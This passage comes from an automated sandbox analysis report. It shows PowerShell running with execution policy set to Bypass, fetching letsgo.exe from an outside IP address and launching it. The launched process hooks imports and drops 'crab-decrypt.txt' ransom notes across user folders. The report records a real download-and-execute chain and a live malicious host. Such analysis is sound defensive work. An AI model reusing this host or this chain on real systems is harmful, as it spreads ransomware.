Get Filename - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 True 2
User (1)
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
System (275)
Operation Additional Information Success Count Logfile
Sleep duration = 0 milliseconds (0.000 seconds) True 207
Sleep duration = 0 milliseconds (0.000 seconds) True 2
Sleep duration = -1 (infinite) True 2
Get Info type = SYSTEM_PROCESS_INFORMATION True 2
Get Info type = System Directory, result_out = C:\Windows\system32 True 31
Get Info type = Hardware Information True 31
Mutex (2)
Operation Additional Information Success Count Logfile
Create mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 True 1
Release mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 True 1
Environment (72)
Operation Additional Information Success Count Logfile
Get Environment String name = MshEnableTrace False 27
Get Environment String name = PinnableBufferCache_System.Threading.OverlappedData_Disabled False 1
Get Environment String name = PinnableBufferCache_System.Threading.OverlappedData_MinCount False 1
Get Environment String name = PathEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Get Environment String name = PSMODULEPATH, result_out = C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules True 1
Get Environment String name = USERPROFILE, result_out = C:\Users\Nd9E1FYi True 2
Get Environment String name = PSModuleAutoLoadingPreference False 12
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL True 4
Get Environment String name = PATH True 1
Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Get Environment String name = PSMODULEPATH, result_out = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules True 4
Get Environment String name = PSDisableModuleAutoLoadingMemoryCache False 8
Get Environment String name = PSDisableModuleAutoloadingCacheMaintenance False 1
Get Environment String name = PinnableBufferCache_System.Net.HttpWebRequest_Disabled False 1
Get Environment String name = PinnableBufferCache_System.Net.HttpWebRequest_MinCount False 1
Get Environment String name = PinnableBufferCache_System.Net.Connection_Disabled False 1
Get Environment String name = PinnableBufferCache_System.Net.Connection_MinCount False 1
Set Environment String name = PSExecutionPolicyPreference, value = Bypass True 1
Set Environment String name = PathEXT, value = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL True 1
Set Environment String name = PSMODULEPATH, value = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules True 1
Network Behavior
HTTP Sessions (1)
Information Value
Total Data Sent 79 bytes
Total Data Received 278.76 KB
Contacted Host Count 1
Contacted Hosts 92.63.197.38
HTTP Session #1
Information Value
Server Name 92.63.197.38
Server Port 80
Data Sent 79
Data Received 285450
Operation Additional Information Success Count Logfile
Open Session access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Open Connection protocol = http, server_name = 92.63.197.38, server_port = 80 True 1
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /letsgo.exe?LbPUer True 1
Send HTTP Request headers = host: 92.63.197.38, connection: Keep-Alive, url = 92.63.197.38/letsgo.exe?LbPUer True 1
Read Response size = 4096, size_out = 4096 True 1
Read Response size = 65536, size_out = 10424 True 1
Read Response size = 65536, size_out = 31944 True 1
Read Response size = 65536, size_out = 42108 True 1
Read Response size = 65536, size_out = 5808 True 1
Read Response size = 65536, size_out = 2904 True 1
Read Response size = 65536, size_out = 18876 True 1
Read Response size = 65536, size_out = 15972 True 1
Read Response size = 65536, size_out = 5576 True 1
Read Response size = 65536, size_out = 2904 True 1
Read Response size = 65536, size_out = 65536 True 1
Read Response size = 65536, size_out = 25940 True 1
Read Response size = 53362, size_out = 53362 True 1
Close Session - True 1
Process #6: roamingqtp35.exe
Information Value
ID #6
File Name c:\users\nd9e1fyi\appdata\roamingqtp35.exe
Command Line "C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe"
Initial Working Directory C:\Users\Nd9E1FYi\Desktop\
Monitor Start Time: 00:00:39, Reason: Child Process
Unmonitor End Time: 00:03:23, Reason: Terminated by Timeout
Monitor Duration 00:02:44
OS Process Information
Information Value
PID 0xfd8
Parent PID 0xe98 (c:\windows\system32\windowspowershell\v1.0\powershell.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username X2VS1CUM\Nd9E1FYi
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xFDC
0xFE0
0xB24
0xD48
0xC84
0x454
0x740
0x2C8
0x618
0xE90
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00023fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000040000 0x00040000 0x00054fff Pagefile Backed Memory Readable True False False -
private_0x0000000000060000 0x00060000 0x0009ffff Private Memory Readable, Writable True False False -
private_0x0000000000060000 0x00060000 0x00060fff Private Memory Readable, Writable True False False -
private_0x0000000000060000 0x00060000 0x0006ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000060000 0x00060000 0x00067fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000070000 0x00070000 0x00070fff Private Memory Readable, Writable True False False -
private_0x0000000000070000 0x00070000 0x0016ffff Private Memory Readable, Writable True False False -
private_0x0000000000080000 0x00080000 0x00080fff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x00090fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000000a0000 0x000a0000 0x0019ffff Private Memory Readable, Writable True False False -
private_0x0000000000170000 0x00170000 0x00185fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000170000 0x00170000 0x00177fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000170000 0x00170000 0x00170fff Private Memory Readable, Writable True False False -
private_0x0000000000180000 0x00180000 0x00180fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000180000 0x00180000 0x00181fff Pagefile Backed Memory Readable True False False -
private_0x0000000000190000 0x00190000 0x00190fff Private Memory Readable, Writable, Executable True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a3fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory Readable True False False -
private_0x00000000001c0000 0x001c0000 0x001c1fff Private Memory Readable, Writable True False False -
private_0x00000000001d0000 0x001d0000 0x001d0fff Private Memory Readable, Writable True False False -
private_0x00000000001e0000 0x001e0000 0x001f5fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000200000 0x00200000 0x003fffff Private Memory Readable, Writable True False False -
roamingqtp35.exe 0x00400000 0x0044afff Memory Mapped File Readable, Writable, Executable True True False
private_0x0000000000450000 0x00450000 0x00450fff Private Memory Readable, Writable True False False -
private_0x0000000000460000 0x00460000 0x0055ffff Private Memory Readable, Writable True False False -
locale.nls 0x00560000 0x0061dfff Memory Mapped File Readable False False False -
private_0x0000000000620000 0x00620000 0x0062ffff Private Memory Readable, Writable True False False -
private_0x0000000000630000 0x00630000 0x0066ffff Private Memory Readable, Writable True False False -
private_0x0000000000670000 0x00670000 0x0076ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000770000 0x00770000 0x008f7fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000900000 0x00900000 0x00a80fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000a90000 0x00a90000 0x01e8ffff Pagefile Backed Memory Readable True False False -
private_0x0000000001e90000 0x01e90000 0x01f9ffff Private Memory Readable, Writable True False False -
private_0x0000000001e90000 0x01e90000 0x01eb3fff Private Memory Readable, Writable True False False -
private_0x0000000001e90000 0x01e90000 0x01f1ffff Private Memory Readable, Writable True False False -
private_0x0000000001e90000 0x01e90000 0x01ecffff Private Memory Readable, Writable True False False -
private_0x0000000001ed0000 0x01ed0000 0x01ed0fff Private Memory Readable, Writable, Executable True False False -
pagefile_0x0000000001ed0000 0x01ed0000 0x01ed0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000001ee0000 0x01ee0000 0x01ee0fff Private Memory Readable, Writable True False False -
private_0x0000000001ef0000 0x01ef0000 0x01ef0fff Private Memory Readable, Writable True False False -
private_0x0000000001f00000 0x01f00000 0x01f00fff Private Memory Readable, Writable True False False -
private_0x0000000001f10000 0x01f10000 0x01f1ffff Private Memory Readable, Writable True False False -
private_0x0000000001f20000 0x01f20000 0x01f20fff Private Memory Readable, Writable True False False -
private_0x0000000001f30000 0x01f30000 0x01f30fff Private Memory Readable, Writable True False False -
private_0x0000000001f40000 0x01f40000 0x01f40fff Private Memory Readable, Writable True False False -
private_0x0000000001f50000 0x01f50000 0x01f50fff Private Memory Readable, Writable True False False -
private_0x0000000001f60000 0x01f60000 0x01f60fff Private Memory Readable, Writable True False False -
private_0x0000000001f70000 0x01f70000 0x01f70fff Private Memory Readable, Writable True False False -
private_0x0000000001f80000 0x01f80000 0x01f80fff Private Memory Readable, Writable True False False -
private_0x0000000001f90000 0x01f90000 0x01f9ffff Private Memory Readable, Writable True False False -
private_0x0000000001fa0000 0x01fa0000 0x020a0fff Private Memory Readable, Writable True False False -
private_0x0000000001fa0000 0x01fa0000 0x0215ffff Private Memory Readable, Writable True False False -
private_0x0000000001fa0000 0x01fa0000 0x0209ffff Private Memory Readable, Writable True False False -
private_0x00000000020a0000 0x020a0000 0x020affff Private Memory Readable, Writable True False False -
private_0x00000000020a0000 0x020a0000 0x020b5fff Private Memory Readable, Writable True False False -
pagefile_0x00000000020a0000 0x020a0000 0x020a7fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000020a0000 0x020a0000 0x020a0fff Private Memory Readable, Writable True False False -
pagefile_0x00000000020b0000 0x020b0000 0x020b0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000020c0000 0x020c0000 0x020c7fff Pagefile Backed Memory Readable, Writable True False False -
counters.dat 0x020c0000 0x020c0fff Memory Mapped File Readable, Writable True True False
private_0x00000000020d0000 0x020d0000 0x0210ffff Private Memory Readable, Writable True False False -
private_0x0000000002110000 0x02110000 0x02112fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002110000 0x02110000 0x02127fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002120000 0x02120000 0x02122fff Private Memory Readable, Writable, Executable True False False -
pagefile_0x0000000002130000 0x02130000 0x02130fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000002140000 0x02140000 0x0214ffff Pagefile Backed Memory Readable True False False -
private_0x0000000002150000 0x02150000 0x0215ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x02160000 0x02496fff Memory Mapped File Readable False False False -
pagefile_0x00000000024a0000 0x024a0000 0x0289afff Pagefile Backed Memory Readable True False False -
ole32.dll 0x028a0000 0x02989fff Memory Mapped File Readable False False False -
private_0x00000000028a0000 0x028a0000 0x0299ffff Private Memory Readable, Writable True False False -
private_0x00000000029a0000 0x029a0000 0x029dffff Private Memory Readable, Writable True False False -
private_0x00000000029e0000 0x029e0000 0x02adffff Private Memory Readable, Writable True False False -
private_0x0000000002ae0000 0x02ae0000 0x02b1ffff Private Memory Readable, Writable True False False -
private_0x0000000002b20000 0x02b20000 0x02c1ffff Private Memory Readable, Writable True False False -
private_0x0000000002c20000 0x02c20000 0x02c20fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002c30000 0x02c30000 0x02c30fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002c30000 0x02c30000 0x02c38fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002c40000 0x02c40000 0x02c85fff Private Memory Readable, Writable True False False -
private_0x0000000002c40000 0x02c40000 0x02c40fff Private Memory Readable, Writable True False False -
private_0x0000000002c50000 0x02c50000 0x02c50fff Private Memory Readable, Writable True False False -
private_0x0000000002c50000 0x02c50000 0x02c51fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002c60000 0x02c60000 0x02c60fff Private Memory Readable, Writable True False False -
private_0x0000000002c70000 0x02c70000 0x02c70fff Private Memory Readable, Writable True False False -
private_0x0000000002c70000 0x02c70000 0x02c73fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002c80000 0x02c80000 0x02c82fff Private Memory Readable, Writable True False False -
private_0x0000000002c80000 0x02c80000 0x02cb2fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002c90000 0x02c90000 0x02c90fff Private Memory Readable, Writable True False False -
private_0x0000000002ca0000 0x02ca0000 0x02ca0fff Private Memory Readable, Writable True False False -
private_0x0000000002cb0000 0x02cb0000 0x02cb0fff Private Memory Readable, Writable True False False -
private_0x0000000002cc0000 0x02cc0000 0x02cc2fff Private Memory Readable, Writable, Executable True False False -
wow64win.dll 0x5d0b0000 0x5d129fff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x5d130000 0x5d17ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x5d180000 0x5d187fff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x6f930000 0x6faadfff Memory Mapped File Readable, Writable, Executable False False False -
winhttp.dll 0x6fab0000 0x6fb4afff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x6fb50000 0x6fd5cfff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x702b0000 0x702b7fff Memory Mapped File Readable, Writable, Executable False False False -
ondemandconnroutehelper.dll 0x702c0000 0x702d1fff Memory Mapped File Readable, Writable, Executable False False False -
userenv.dll 0x702e0000 0x702f8fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x70300000 0x7032efff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x70330000 0x70342fff Memory Mapped File Readable, Writable, Executable False False False -
msvcr100.dll 0x70350000 0x7040efff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x71770000 0x717b6fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x717c0000 0x717c7fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x717d0000 0x717fefff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x71810000 0x71893fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x718a0000 0x718eefff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x71910000 0x71bdafff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x73a50000 0x73a6afff Memory Mapped File Readable, Writable, Executable False False False -
apphelp.dll 0x73d00000 0x73d91fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x73da0000 0x73da9fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x73db0000 0x73dcdfff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x741e0000 0x74237fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x74240000 0x7563efff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x75640000 0x75645fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75650000 0x75693fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x756a0000 0x7575dfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75780000 0x75811fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x758a0000 0x758adfff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x758b0000 0x758f4fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75900000 0x7592afff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75bf0000 0x75ccffff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x75cd0000 0x75e8cfff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x75ef0000 0x75f9cfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x76110000 0x76256fff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x76270000 0x762a6fff Memory Mapped File Readable, Writable, Executable False False False -
powrprof.dll 0x762b0000 0x762f3fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x76300000 0x7630efff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x76310000 0x7638afff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76390000 0x7650dfff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x76510000 0x7656efff Memory Mapped File Readable, Writable, Executable False False False -
shcore.dll 0x76600000 0x7668cfff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76690000 0x76696fff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x76700000 0x7670bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x76710000 0x7685efff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x76860000 0x769d7fff Memory Mapped File Readable, Writable, Executable False False False -
windows.storage.dll 0x769e0000 0x76ed8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77080000 0x771fafff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007feb0000 0x7feb0000 0x7ffaffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7ffc173fffff Private Memory Readable True False False -
ntdll.dll 0x7ffc17400000 0x7ffc175c0fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ffc175c1000 0x7ffc175c1000 0x7ffffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 212 entries are omitted.
The remaining entries can be found in flog.txt.
Hook Information
Type Installer Target Size Information Actions
IAT private_0x0000000000460000:+0x72ecc 11. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetCommTimeouts+0x0 now points to private_0x000000007fff0000:+0x51fd5215
IAT private_0x0000000000460000:+0x72ecc 15. entry of roamingqtp35.exe 4 bytes kernel32.dll:CompareStringA+0x0 now points to private_0x000000007fff0000:+0x52ddfb55
IAT private_0x0000000000460000:+0x72ecc 20. entry of roamingqtp35.exe 4 bytes kernel32.dll:WriteConsoleW+0x0 now points to private_0x000000007fff0000:+0x7b046002
IAT private_0x0000000000460000:+0x72ecc 21. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetConsoleOutputCP+0x0 now points to private_0x000000007fff0000:+0x7516097b
IAT private_0x0000000000460000:+0x72ecc 22. entry of roamingqtp35.exe 4 bytes kernel32.dll:WriteConsoleA+0x0 now points to private_0x000000007fff0000:+0x2046cd6
IAT private_0x0000000000460000:+0x72ecc 27. entry of roamingqtp35.exe 4 bytes kernel32.dll:SetHandleCount+0x0 now points to private_0x000000007fff0000:+0x25161fce
IAT private_0x0000000000460000:+0x72ecc 30. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetStartupInfoA+0x0 now points to private_0x000000007fff0000:+0x7cd8fa5c
IAT private_0x0000000000460000:+0x72ecc 31. entry of roamingqtp35.exe 4 bytes ntdll.dll:RtlDeleteCriticalSection+0x0 now points to private_0x000000007fff0000:+0x9242e76
IAT private_0x0000000000460000:+0x72ecc 32. entry of roamingqtp35.exe 4 bytes kernel32.dll:TerminateProcess+0x0 now points to private_0x000000007fff0000:+0x5dcf6b3b
IAT private_0x0000000000460000:+0x72ecc 33. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetCurrentProcess+0x0 now points to private_0x000000007fff0000:+0x7d6a5255
IAT private_0x0000000000460000:+0x72ecc 35. entry of roamingqtp35.exe 4 bytes kernel32.dll:SetUnhandledExceptionFilter+0x0 now points to private_0x000000007fff0000:+0x6c633147
IAT private_0x0000000000460000:+0x72ecc 36. entry of roamingqtp35.exe 4 bytes kernel32.dll:IsDebuggerPresent+0x0 now points to private_0x000000007fff0000:+0x750303f9
IAT private_0x0000000000460000:+0x72ecc 39. entry of roamingqtp35.exe 4 bytes kernel32.dll:ExitProcess+0x0 now points to private_0x000000007fff0000:+0x7f836a17
IAT private_0x0000000000460000:+0x72ecc 40. entry of roamingqtp35.exe 4 bytes kernel32.dll:WriteFile+0x0 now points to private_0x000000007fff0000:+0x4e7c1f04
IAT private_0x0000000000460000:+0x72ecc 42. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetModuleFileNameW+0x0 now points to private_0x000000007fff0000:+0x57fd5c12
IAT private_0x0000000000460000:+0x72ecc 44. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetEnvironmentStringsW+0x0 now points to private_0x000000007fff0000:+0x7d463088
IAT private_0x0000000000460000:+0x72ecc 49. entry of roamingqtp35.exe 4 bytes kernel32.dll:TlsFree+0x0 now points to private_0x000000007fff0000:+0x24ba1fce
IAT private_0x0000000000460000:+0x72ecc 50. entry of roamingqtp35.exe 4 bytes kernel32.dll:InterlockedIncrement+0x0 now points to private_0x000000007fff0000:+0x433a1203
IAT private_0x0000000000460000:+0x72ecc 73. entry of roamingqtp35.exe 4 bytes kernel32.dll:LoadLibraryA+0x0 now points to private_0x000000007fff0000:+0x3a3e0fa5
IAT private_0x0000000000460000:+0x72ecc 76. entry of roamingqtp35.exe 4 bytes ntdll.dll:RtlReAllocateHeap+0x0 now points to private_0x000000007fff0000:+0x936cdce
IAT private_0x0000000000460000:+0x72ecc 83. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetStringTypeA+0x0 now points to private_0x000000007fff0000:+0xedafd55
IAT private_0x0000000000460000:+0x72ecc 86. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetDateFormatA+0x0 now points to private_0x000000007fff0000:+0x44872e26
IAT private_0x0000000000460000:+0x72ecc 90. entry of roamingqtp35.exe 4 bytes kernel32.dll:IsValidLocale+0x0 now points to private_0x000000007fff0000:+0xe5dea1e
IAT private_0x0000000000460000:+0x72ecc 92. entry of roamingqtp35.exe 4 bytes ntdll.dll:RtlSizeHeap+0x0 now points to private_0x000000007fff0000:+0x26dafb13
IAT private_0x0000000000460000:+0x72ecc 96. entry of roamingqtp35.exe 4 bytes user32.dll:GetProcessWindowStation+0x0 now points to private_0x000000007fff0000:+0x3056d04
Created Files
Filename File Size Hash Values YARA Match Actions
c:\$recycle.bin\s-1-5-21-2172869166-1497266965-2109836178-1000\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\adobe\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\adobe\acrobat\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\adobe\acrobat\dc\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\adobe\acrobat\dc\collab\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\adobe\acrobat\dc\forms\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\adobe\acrobat\dc\jscache\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\adobe\acrobat\dc\security\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\adobe\acrobat\dc\security\crlcache\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\adobe\flash player\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\adobe\flash player\assetcache\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\adobe\flash player\assetcache\eygueqkq\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\adobe\flash player\nativecache\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\adobe\headlights\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\adobe\linguistics\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\adobe\logtransport2\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\adobe\logtransport2\logs\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
